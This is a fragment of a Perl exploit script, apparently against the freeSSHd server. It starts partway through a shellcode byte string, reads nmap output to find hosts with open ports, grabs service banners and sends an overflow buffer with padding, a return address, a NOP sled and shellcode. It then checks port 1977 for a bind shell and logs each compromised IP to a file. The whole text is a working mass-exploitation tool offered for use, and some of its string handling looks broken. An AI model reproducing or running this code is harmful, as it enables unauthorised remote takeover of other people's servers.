xd0\x66\x6a\x64". "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\ xe7\x6a\x44\x89". "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\ x8d\x7a\x38\xab". "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\ x5b\x57\x52\x51". "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\ xd9\x05\xce\x53". "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\ xc4\x64\xff\xd6". "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\ xd0"; print "$info"; &usage if !@ARGV; &main; sub main { while (<>) { if (/^Interesting ports on.\((\S+)\):/) { $ip = $1; $i++; } foreach $port (@banner) { if (/^$port\/(\w+)\s+open/) { $proto = $1; $p++; &banner($ip, $port, $proto); } } } &stats; } sub banner { my ($ip, $port, $proto) = @_; print "$ip:$port\t=> "; socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto)); connect(SOCK, sockaddr_in($port, inet_aton($ip))); if ($port != 80) { $banner =<SOCK>; close(SOCK); print "$banner"; } else { send(SOCK, "GET / HTTP/1.0\n\n", 0); @o = <SOCK>; close(SOCK); foreach (@o) { if (/Server:\s(.)/) { $banner = $1; print "$banner"; } } } if($banner != 'SSH-2.0-WeOnlyDo 1.2.7'){ &exploit($ip,$port,$proto); } } sub exploit { my ($ip,$port,$proto) = @_; if ($check_before = IO::Socket::INET->new(PeerAddr => "$ip:22")){ my $buff = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\ x6e\x53\x53\x48". "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\ x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x07\xde"; my $buff = $buff + "A" * 1055; my $buff = $buff + $eip; my $buff = $buff + "yyyy"; my $buff = $buff + "\x90" * 4; my $buff = $buff + $shellcode; my $buff = $buff + "B" * 19021 + "\r\n"; print "[~] Try to connect to $ip\n"; socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname($proto)); connect(SOCK, sockaddr_in($port, inet_aton($ip))); print "[~] Creating Buffer\n"; send(SOCK, $buff, 0); close(SOCK); print "[~] Send Buffer\n"; print "[~] checking ...\n"; sleep(1); if ($check = IO::Socket::INET->new(PeerAddr => "$ip:1977")){ print "[~] YoU got an Shell\n". "Connect over Telnet on Port 1977\n"; open(OUTPUT, '>>freesshd.txt'); print OUTPUT "$ip\n"; close(OUTPUT); } else { print "Sorry, Dude !\n"; } } } sub usage { print "freesshd.pl <infile>\n"; } cyberstorm